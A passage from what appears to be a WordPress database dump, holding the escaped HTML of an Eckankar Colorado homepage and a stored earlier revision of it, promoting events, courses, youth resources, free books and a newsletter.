padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237974,40470,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(238012,40477,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a 